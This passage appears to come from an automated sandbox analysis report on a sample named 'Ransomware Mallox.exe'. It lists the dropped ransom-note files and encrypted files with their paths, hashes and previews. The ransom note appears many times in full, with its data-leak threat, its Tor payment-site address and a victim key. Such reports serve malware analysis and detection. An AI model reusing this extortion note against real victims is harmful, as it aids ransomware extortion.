                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):12396
                    Entropy (8bit):7.983639665580372
                    Encrypted:false
                    SSDEEP:384:HaxNzdFg6kCzqqUwIz4kSc0f1ZMU8x4nUPPQ:HQpdFg6kNqUtz4f17g4UPPQ
                    MD5:19714F8D67A76D0BDE2438638FDCCDAC
                    SHA1:E48A39FE336C2EDC628A34BA03317D6B05E27D09
                    SHA-256:6598CD1B8044972F280CF3128371A4C2B6052BACEFFA80C1262E910C9401C48E
                    SHA-512:0289BE4FDFE4D390E3C69201DAD98B2BE0AFB80DC264DAA5C6C015C66614EC2052FF839DEC7C35927CD1C699CDCE389B35DEE87D48D7954B926CFAAB453A24FE
                    Malicious:false
                    Preview:.A.UN+..r.@....!.f...>......DW.5...)#..&>........:l..?!..~g#.i.!8....^+f.g.,...}G(V..C...Kq.........x.n.wB..._O.74z%..M.o..K..vAD....w..kO..Z3.F'".c3.{..Pd..~.}.bdR..0r...{G..,N.#B...k)z`0.z*....\\...{O.r....}f....``....3.\tMsd.i"].V..O8..[u.........r...L.......d.?......!.....z.GXU..am[.*BQ..-k....b&r.......S..&..I.,yp.J........e....m.a{.[..".n.5.... ..t.N..........).@DF:os...9..)...4...?........{......M.sl6..>B... .8.@.W...)..Q.i........h.n<.x...%1`..g..M&z.oB(@.2...3(..Q..`:$..;n.........$..O...$.W.c*F."vSv.^Cb.Q.....hK.r...5v..5Xcd...r..?..CS.[..=....X...tD.*......:p.]..{.g.0.{....V.....h1c...(f..5H...\..|..E.I"z..'.{...$...I..]E..#....vh..._....)O.#2.7tJ.R..l.EL.8.Kk~.:.m0.............1.Y...1...S.\..W_..p.......B...B{....@.....<x.X..>.d.dR...;....wM.........:..R.......w1>.DQ....)(p.qO5.)....{.U....).%o....ArGFP..@Z.}Uj..w.k.O..y..B:k.....Qw......c...5y.|.....g..8..A&d|..^[mh{81I[........C.4z.........4.v.{...&GI.O.t.I.i.jg8. .......

                    C:\Users\user\AppData\Local\Adobe\Acrobat\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Adobe\Color\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Adobe\Color\Profiles\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Adobe\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Comms\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Comms\UnistoreDB\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00001.jrs

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):3145836
                    Entropy (8bit):7.999943484589841
                    Encrypted:true
                    SSDEEP:49152:UGObMtIvqPcM7C59OiI5Iw2fULOHFEeMIk4Q34CtHJOHw1IjgbwYsiBB5L:Ux0IyPcMYq5IwqU8Es2HYHwvszK5L
                    MD5:3C65270DED8D07ED1670A08636715522
                    SHA1:75BD79B5FA95B83CAD1CDD206DA1768FE3666AFB
                    SHA-256:5EF11493630C1B0E63DDC3B479EA0752034CC60578CC32131B49F30C90D72C2F
                    SHA-512:E54E5C51BAD79F4C7EB878ECCDB3F05948F57CB14255D6E24CB82BD61759CE7CD7D6F5FC01D63F211977D6329D33084FD3A07CD0AB6F38D959FC2426BC1B8EB6
                    Malicious:true
                    Preview:..d......./.?..'.:/D.q.v..P.#l.W.......Ym.>.W..*c.B.\.....".i/7v..T.1..k.(.^m4H.w.s.m.vC.....n.p.x....u.1..2L.Y...6.@.$...F.!.....bekwn..o.."...v+..sX..)D.X..........^...(b..-....z....uTg...5t.*y...[.....(.>._L'.....l.@..dd....Ud..D.h...$..c.F.Xrw[.`?..\*Xy.q.$%...n?2...<*.$.s..4g,\D..bp. p*..5..=.a..G....bt..Y9.f..s...F.g....pL...r.B..dg[..<?.n..G.{..x.P..r...xZ.]..#U..o.z=.^.a$....*R..\.<.F..&3-...P..m....p..zU>.6.4...X..4....x9......1.?.-D..q......I..V..a..tm.>.:.."5.{..........A.".>'xx..V.W...2.'.$...Qw.<B...>..w..*N.N.m..U.P..h-p....M....%WD.W...z/...f..:~...........=.."@.]a..Y2..u+\X.!.B.%.0...............*..^.O/Y...^..... ,.9.q.s...Y:.} ..].9j.L...e+.QXF._.E_Q....NW.:(..wz.7k.P@.W...G4...q..8.q...]1....B]..K|0.u......y~.Q.M:\u ....:.1..PJ.].K.].T...[...Lb...<.0.2.p.y...#.UA..(1.V .u)..8....W.4D......SYB.....;`.g.. ..e D..2S.......g3...)e,,Yb.Y.....gS..j.W..,.7O.?.5..*.J....Ty......-...#{t5....K.[..A^\ .t..O.o^...H..=.......L.F8}Q.

                    C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00002.jrs

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:OpenPGP Public Key
                    Category:dropped
                    Size (bytes):3145836
                    Entropy (8bit):7.999940723965446
                    Encrypted:true
                    SSDEEP:49152:d2n1NfKv7m8GClo3tml1zPZle3W2GZheCHCykR+BVL11uZOvmZMbCADUTrxhkkdh:d2nnfE7M3tmhIW2G7Viy7vm2bJSsDn6
                    MD5:DE69E7ED664C2E008219C2B7477E0487
                    SHA1:81429AFEA8B87F9953BCF0D683D104668953435C
                    SHA-256:B702C07DDCB5AE954D23405D9146EAC4A381E41FCF890A75242846B88210674D
                    SHA-512:53AD3502DAF593855BDD883F06945F754FEDBB1BA6D3F106214F693A7C50097D06A7FB2CC411FCE5DFE950325EF5F274B18D4F5EFC589D9099FF3DA8C2F7FC26
                    Malicious:true
                    Preview:. .....[. .,.....e.t:.....X.I..+..R}'....-......=..C..>@...X......?J:'.<.....$.%.cv#..;l.B...QT.J.9...."...z&.a..=~_.`R.=*d..Ca.P{5.U..vv.O...F..(...][b.X..7..S&C..xQ....g|...>..v..... .,..O}.. ...2.....G]...9Hf.H...L+l...M..X.L.PE.#;..?*.4.0.....)NoT..B....;....%..9..........F..z."b..]..6L..-.n..`Oj....R...l.%..N..BY....E.M..>mEK...[.Jy?<{r.:E-.Q%.)'.^.r~.6!..U.....?..tUj(..Q32k.fS.......*.2..<.a...N...o.*.....e.I....[.....C..`C.Bp.I...6.IN..;L....U.u~(...h\...\/]O..V..<...p..o..........2\`o.L.......?^.mrxUf...._$.jS.C@z.P.....zE....u....^>....F..g...|....P...'..THh...&.."m6.'.....,x....'Z....3..C..N ...k.h...YK..U.V...".G...W.n.$...E`.~..e.]|..B.}+...p3......5R.{..v...I..s.^t..D.\..5......|...j.6c.B....}.pP..._./.vfj.6.,B...]..kZ..nD.%..D|"....f..j..LY...o ........l..'Su..b....5......I...B.~..}......u..Pp.....w#^...>.[g./.v..u........../:Pe...QB8..H..F...]C}....yt.f......]....Z.h......Z..GZ.......~<..Y6..OO.d..+Jv'J..vi...d..

                    C:\Users\user\AppData\Local\Comms\UnistoreDB\USStmp.jtx

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):3145836
                    Entropy (8bit):7.9999425912960795
                    Encrypted:true
                    SSDEEP:98304:kV4xy33Q0G6ah5BRSbVVhcS9PZgHx+Hrstx:WvA0G6ah5HSpSRmrstx
                    MD5:2FD49F47F036882F868AE6DFDE161673
                    SHA1:6C488EDDBA49D088A1A61C3EFC8C5BB4409D6552
                    SHA-256:8F71A5413994436E49B89FB01B95D00DD0FCBB7C22A3F94C6250DFAE944B6C27
                    SHA-512:EB62F886D7731B7F1102C84DA0C9E4E35838644A9936C99B5E27A8262617155ED9449CAFD1933E22527201F116B54AFA8A18B51F79064F27DC66D6038CCD2BC6
                    Malicious:true
                    Preview:.Si.^7....g...........,...^.F....?c<....m {t(.D.y.7...@H^Q.....".5G.H..]....k7&w.......t~.y.OA...il...s.A..>!.........9.S..}.V..x*...I-v...3./...`.......+.&..K.6..._.'......m|.DN.OAT.......f#i...x..?9.-.\..k.j..`O......>gh,:..Q...d(z.]G....j......&...>...z......|g.d.=....*,....v..FE....3.e.v@..6...6..u..j..i.:OW.x...y.Tb^...y..X$.[..'#.{.Mo.1 z.\.s....+...p$............6..r.....<(..uD..p.QU#,Tp...&*.3.,..Z.{. `....K.>..iY._..........~{y.....:.P........qo.)..J/..{.....\.=..lx...p...8.#L..S...);*....D....z._.$...{P.B.S.......eB..yxa?..4\E(}..&.rELz.m..$].]G....`...0.....v78....kB.'.l<I.t..b.7..j...~%*..[....W..g._M....W?-.......n..iV....b.(^.y.......}..mEU[*Z"5.|..O..!..'/..*...2.A.o.6..t.. ..xe..+......a..4.G J'nDS...U.Po....q#....aG.......>.YI..T.....m...et.../...@T......v.8M.KT23l"....&...N8-m.j..y..>.....4f;..'......S.w.j.um.v...M.:....:=..Xf..L...l...1!..M.*..5.....FaS(.*..>.5.m&m..`O........#....{..w~.6..kG.]..P...f.o.(..

                    C:\Users\user\AppData\Local\Comms\Unistore\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Comms\Unistore\data\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\ConnectedDevicesPlatform\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\D3DSCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\D3DSCache\f4d41c5d09ae781\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
